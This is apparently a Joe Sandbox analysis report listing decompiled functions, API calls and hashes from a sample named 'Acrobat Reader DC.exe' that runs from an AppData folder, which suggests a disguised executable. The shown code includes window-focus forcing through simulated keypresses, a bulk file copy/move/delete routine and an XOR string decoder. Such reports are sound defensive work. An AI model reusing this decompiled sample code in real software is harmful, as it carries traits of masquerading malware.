                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046F3C1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0046F3C1(void* __ecx, void* __fp0, struct HWND__* _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t25;
				struct HWND__* _t26;
				void* _t27;
				struct HWND__* _t32;

				_t27 = __ecx;
				_t32 = _a4;
				_t35 = _t32 + 0x2e0;
				E004109E0(_t11, _t32 + 0x2e0);
				_t25 = _t32 + 0x1b8;
				_t13 = E004426BB(_t25);
				_push(_t25);
				if(_t13 == 0) {
					_t14 = E00443833();
					__eflags = _t14;
					if(_t14 == 0) {
						goto L3;
					} else {
						_t17 = E004533EB(_t25);
						_t33 = _t32 + 0x1d8;
						__eflags = _t32 + 0x1d8;
						_t18 = E0046ED8E(_t32 + 0x1d8, __fp0, _t33, _t17, _t32 + 0x1c8, _t35,  *((intOrPtr*)(_t32 + 0x2d4)),  *(_t32 + 0x2dd) & 0x000000ff,  *(_t32 + 0x2dc) & 0x000000ff, _a8); // executed
						return _t18;
					}
				} else {
					_t26 = E0044B3AC();
					_a4 = _t26;
					if(IsWindow(_t26) == 0) {
						L3:
						__eflags = 0;
						return 0;
					} else {
						E0044CDAF(_t27, _t32 + 0x1d8, _t32 + 0x1d8, _t26);
						E00436299(_t35,  &_a4);
						return 1;
					}
				}
			}














                                  0x0046f3c1
                                  0x0046f3c7
                                  0x0046f3ca
                                  0x0046f3d0
                                  0x0046f3d5
                                  0x0046f3dc
                                  0x0046f3e1
                                  0x0046f3e4
                                  0x0046f427
                                  0x0046f42c
                                  0x0046f42e
                                  0x00000000
                                  0x0046f430
                                  0x0046f454
                                  0x0046f45a
                                  0x0046f45a
                                  0x0046f461
                                  0x0046f46a
                                  0x0046f46a
                                  0x0046f3e6
                                  0x0046f3eb
                                  0x0046f3ee
                                  0x0046f3f9
                                  0x0046f41e
                                  0x0046f41e
                                  0x0046f424
                                  0x0046f3fb
                                  0x0046f403
                                  0x0046f40d
                                  0x0046f41b
                                  0x0046f41b
                                  0x0046f3f9

                                  APIs
                                  • IsWindow.USER32(00000000), ref: 0046F3F1
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window_memmove
                                  • String ID:
                                  • API String ID: 517827167-0
                                  • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                  • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F677 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0041F677(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x496e6c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x496e68;
					if( *0x496e68 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00411988(_t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00417F77(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                  0x0041f67c
                                  0x0041f681
                                  0x0041f69e
                                  0x0041f6a3
                                  0x0041f6a5
                                  0x0041f6a7
                                  0x0041f6a9
                                  0x0041f6a9
                                  0x0041f6a9
                                  0x00000000
                                  0x0041f6b1
                                  0x0041f6ba
                                  0x0041f6c0
                                  0x0041f6c2
                                  0x00000000
                                  0x00000000
                                  0x0041f6f6
                                  0x0041f6f8
                                  0x00000000
                                  0x0041f6c4
                                  0x0041f6c4
                                  0x0041f6cb
                                  0x0041f6e9
                                  0x0041f6ec
                                  0x0041f6ee
                                  0x0041f6f0
                                  0x0041f6f0
                                  0x0041f6cd
                                  0x0041f6ce
                                  0x0041f6d4
                                  0x0041f6d6
                                  0x0041f6aa
                                  0x0041f6aa
                                  0x0041f6ac
                                  0x0041f6af
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041f6d8
                                  0x0041f6d8
                                  0x0041f6db
                                  0x0041f6dd
                                  0x0041f6df
                                  0x0041f6df
                                  0x0041f6e5
                                  0x0041f6e5
                                  0x0041f6d6
                                  0x00000000
                                  0x0041f683
                                  0x0041f687
                                  0x0041f68a
                                  0x0041f68d
                                  0x00000000
                                  0x0041f68f
                                  0x0041f694
                                  0x0041f69d
                                  0x0041f69d
                                  0x0041f68d
                                  0x00000000

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00416B5F,004115F6,?,00000000,00000000,00000000,?,00417A1B,00000001,00000214,?,004115F6), ref: 0041F6BA
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap__getptd_noexit
                                  • String ID:
                                  • API String ID: 328603210-0
                                  • Opcode ID: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction ID: b12b70d0c6160b5ee631c5b95a8e6af17588d2488de0a25e1c35044c814a7025
                                  • Opcode Fuzzy Hash: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction Fuzzy Hash: FB01B1352002159BEB249F35DC14BEB3354AB91764F15453BE815CA2B0DB788C87C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00444AF8(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* __edi;
				void* __esi;
				void* _t23;
				void* _t28;
				signed int _t29;
				void* _t31;
				signed short _t41;
				intOrPtr* _t42;

				_t42 = _a8;
				_t3 =  *_t42 + 4; // 0x4
				_t41 =  *( *_t42 + _a4);
				 *_t42 = _t3;
				_t5 = _t41 + 1; // 0x485a85
				_push( ~(0 | __eflags > 0x00000000) | _t5 * 0x00000002); // executed
				_t23 = E004115D7(_t41, _t42, __eflags); // executed
				_t31 = _t23;
				E00410E60(_t31,  *_t42 + _a4, _t41 + _t41);
				_t28 = _t41 + _t41;
				 *_t42 =  *_t42 + _t28;
				 *((short*)(_t28 + _t31)) = 0;
				_t29 = 0;
				if(_t41 > 0) {
					do {
						 *(_t31 + _t29 * 2) =  *(_t31 + _t29 * 2) ^ _t41;
						_t29 = _t29 + 1;
					} while (_t29 < _t41);
				}
				return _t31;
			}











                                  0x00444b00
                                  0x00444b05
                                  0x00444b09
                                  0x00444b0c
                                  0x00444b10
                                  0x00444b21
                                  0x00444b22
                                  0x00444b27
                                  0x00444b34
                                  0x00444b39
                                  0x00444b3c
                                  0x00444b40
                                  0x00444b47
                                  0x00444b4b
                                  0x00444b4d
                                  0x00444b4d
                                  0x00444b51
                                  0x00444b52
                                  0x00444b4d
                                  0x00444b5c

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004118DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E004118DA(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0041179A(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










                                  0x004118df
                                  0x004118e1
                                  0x004118e3
                                  0x004118e6
                                  0x004118ef

                                  APIs
                                  • _doexit.LIBCMT ref: 004118E6
                                    • Part of subcall function 0041179A: __lock.LIBCMT ref: 004117A8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_doexit
                                  • String ID:
                                  • API String ID: 368792745-0
                                  • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction ID: 5a17ee954bf67223b14f28cd02c2113b96eab5bc454a4982446cab3363f3b6fe
                                  • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction Fuzzy Hash: 0DB0923258020C33DA202652AC03F563A0A87C0B64F240021BA1C1D2E1A9A2A9A58089
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E004149C2(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00414904(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                                  0x004149c7
                                  0x004149c9
                                  0x004149cc
                                  0x004149cf
                                  0x004149d8

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00434418(struct HWND__* _a4) {
				long _v8;
				int _v12;
				struct HWND__* _t13;
				DWORD* _t15;
				long _t20;
				int _t24;
				long _t39;
				struct HWND__* _t45;
				long _t46;
				struct HWND__* _t47;

				_t13 = GetForegroundWindow();
				_t45 = _a4;
				_t47 = _t13;
				if(_t45 != _t47) {
					if(_t47 == 0) {
						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
					}
					if(IsIconic(_t45) != 0) {
						ShowWindow(_t45, 9);
					}
					_v12 = 0;
					_t15 = SetForegroundWindow(_t45);
					if(_t15 != 0) {
						return 2;
					} else {
						_t46 = GetWindowThreadProcessId(_t47, _t15);
						_t39 = GetCurrentThreadId();
						_t20 = GetWindowThreadProcessId(_a4, 0);
						_v8 = _t20;
						AttachThreadInput(_t39, _t20, 1);
						AttachThreadInput(_t39, _t46, 1);
						AttachThreadInput(_t46, _v8, 1);
						_t24 = SetForegroundWindow(_a4);
						if(_t24 != 0) {
							_v12 = 3;
						} else {
							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							if(SetForegroundWindow(_a4) != 0) {
								_v12 = 4;
							}
						}
						AttachThreadInput(_t39, _v8, 0);
						AttachThreadInput(_t39, _t46, 0);
						AttachThreadInput(_t46, _v8, 0);
						return _v12;
					}
				} else {
					return 1;
				}
			}













                                  0x00434420
                                  0x00434426
                                  0x00434429
                                  0x0043442d
                                  0x0043443e
                                  0x0043444c
                                  0x0043444c
                                  0x00434457
                                  0x0043445c
                                  0x0043445c
                                  0x00434463
                                  0x0043446a
                                  0x00434472
                                  0x00434566
                                  0x00434478
                                  0x00434483
                                  0x0043448b
                                  0x00434493
                                  0x0043449f
                                  0x004344a2
                                  0x004344a8
                                  0x004344b1
                                  0x004344b7
                                  0x004344bf
                                  0x00434531
                                  0x004344c1
                                  0x004344cf
                                  0x004344e6
                                  0x004344fd
                                  0x00434514
                                  0x00434526
                                  0x00434528
                                  0x00434528
                                  0x00434526
                                  0x0043453f
                                  0x00434545
                                  0x0043454e
                                  0x00434559
                                  0x00434559
                                  0x00434430
                                  0x00434439
                                  0x00434439

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32 ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32 ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32 ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32 ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E0044BD27(void* __edx, void* __eflags, intOrPtr _a4, short _a8, char _a12, char _a16, short _a536, short _a1064, char _a1592, struct _WIN32_FIND_DATAW _a2120, char _a2164, char _a2712, char _a3232, char _a3752) {
				char _v0;
				char _v1;
				int _v2;
				void* __ebx;
				void* __edi;
				void* _t61;
				void* _t62;
				int _t70;
				void* _t79;
				int _t81;
				int _t85;
				int _t88;
				int _t95;
				void* _t126;
				void* _t131;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t140;

				_t140 = __eflags;
				E00422240(0x10b4);
				_push(_t126);
				_t95 = 0;
				E00410120( &_a1064, _a4, __edx);
				E00410120( &_a1592, _a8, __edx);
				_v1 = E00433908(_t126, _t140,  &_a1064,  &_a1592);
				_t61 = E00433998( &_a1064);
				_t136 = (_t134 & 0xfffffff8) + 0xc;
				if(_t61 != 0) {
					E00411536( &_a1064, L"\\*.*");
					_t136 = _t136 + 8;
				}
				_t62 = E00433998( &_a1592);
				_t137 = _t136 + 4;
				if(_t62 != 0) {
					E00411536( &_a1592, L"\\*.*");
					_t137 = _t137 + 8;
				}
				E00413A0E( &_a1064,  &_v0,  &_a2712,  &_a3752,  &_a3232);
				_t138 = _t137 + 0x14;
				_t131 = FindFirstFileW( &_a1064,  &_a2120);
				_v2 = 1;
				if(_t131 == 0xffffffff) {
					L24:
					FindClose(_t131);
					return _t95;
				} else {
					while(_v2 == 1) {
						if((_a2120.dwFileAttributes & 0x00000010) != 0) {
							L22:
							_t70 = FindNextFileW(_t131,  &_a2120);
							__eflags = _t70;
							if(_t70 == 0) {
								_v2 = _t70;
							}
							continue;
						} else {
							E00433784(_t95,  &_a2164,  &_a3752,  &_a3232,  &_a1592,  &_a536);
							E00411567( &_a8,  &_v0);
							E00411536( &_a8,  &_a2712);
							E00411536( &_a8,  &_a2164);
							_t79 = E004339FA( &_a536);
							_t138 = _t138 + 0x30;
							if(_t79 == 0) {
								L12:
								if(_a16 != 1) {
									_t81 = CopyFileW( &_a8,  &_a536, 0);
									goto L18;
								} else {
									if(_v1 != 0) {
										_t85 = CopyFileW( &_a8,  &_a536, 0);
										__eflags = _t85;
										if(_t85 == 0) {
											goto L19;
										} else {
											_t81 = DeleteFileW( &_a8);
											goto L18;
										}
									} else {
										_t81 = MoveFileW( &_a8,  &_a536);
										L18:
										if(_t81 != 0) {
											goto L21;
										} else {
											goto L19;
										}
									}
								}
							} else {
								if(_a12 == 0) {
									L19:
									FindClose(_t131);
									return 0;
								} else {
									if(lstrcmpiW( &_a8,  &_a536) == 0) {
										_t88 = MoveFileW( &_a8,  &_a536);
										__eflags = _t88;
										if(_t88 == 0) {
											goto L19;
										} else {
											L21:
											_t95 = 1;
											goto L22;
										}
									} else {
										DeleteFileW( &_a536);
										goto L12;
									}
								}
							}
						}
						goto L25;
					}
					goto L24;
				}
				L25:
			}























                                  0x0044bd27
                                  0x0044bd32
                                  0x0044bd3c
                                  0x0044bd44
                                  0x0044bd46
                                  0x0044bd55
                                  0x0044bd77
                                  0x0044bd7b
                                  0x0044bd80
                                  0x0044bd85
                                  0x0044bd94
                                  0x0044bd99
                                  0x0044bd99
                                  0x0044bda4
                                  0x0044bda9
                                  0x0044bdae
                                  0x0044bdbd
                                  0x0044bdc2
                                  0x0044bdc2
                                  0x0044bdea
                                  0x0044bdef
                                  0x0044be08
                                  0x0044be0a
                                  0x0044be12
                                  0x0044bf7b
                                  0x0044bf7c
                                  0x0044bf8a
                                  0x0044be18
                                  0x0044be1e
                                  0x0044be31
                                  0x0044bf5b
                                  0x0044bf64
                                  0x0044bf6a
                                  0x0044bf6c
                                  0x0044bf72
                                  0x0044bf72
                                  0x00000000
                                  0x0044be37
                                  0x0044be5f
                                  0x0044be71
                                  0x0044be83
                                  0x0044be95
                                  0x0044bea2
                                  0x0044bea7
                                  0x0044beac
                                  0x0044bed9
                                  0x0044bedd
                                  0x0044bf2c
                                  0x00000000
                                  0x0044bedf
                                  0x0044bee4
                                  0x0044bf0a
                                  0x0044bf0c
                                  0x0044bf0e
                                  0x00000000
                                  0x0044bf10
                                  0x0044bf15
                                  0x00000000
                                  0x0044bf15
                                  0x0044bee6
                                  0x0044bef3
                                  0x0044bf2e
                                  0x0044bf30
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044bf30
                                  0x0044bee4
                                  0x0044beae
                                  0x0044beb2
                                  0x0044bf32
                                  0x0044bf33
                                  0x0044bf41
                                  0x0044beb4
                                  0x0044bec9
                                  0x0044bf4f
                                  0x0044bf55
                                  0x0044bf57
                                  0x00000000
                                  0x0044bf59
                                  0x0044bf59
                                  0x0044bf59
                                  0x00000000
                                  0x0044bf59
                                  0x0044becb
                                  0x0044bed3
                                  0x00000000
                                  0x0044bed3
                                  0x0044bec9
                                  0x0044beb2
                                  0x0044beac
                                  0x00000000
                                  0x0044be31
                                  0x00000000
                                  0x0044be1e
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • _wcscat.LIBCMT ref: 0044BD94
                                  • _wcscat.LIBCMT ref: 0044BDBD
                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                  • _wcscpy.LIBCMT ref: 0044BE71
                                  • _wcscat.LIBCMT ref: 0044BE83
                                  • _wcscat.LIBCMT ref: 0044BE95
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
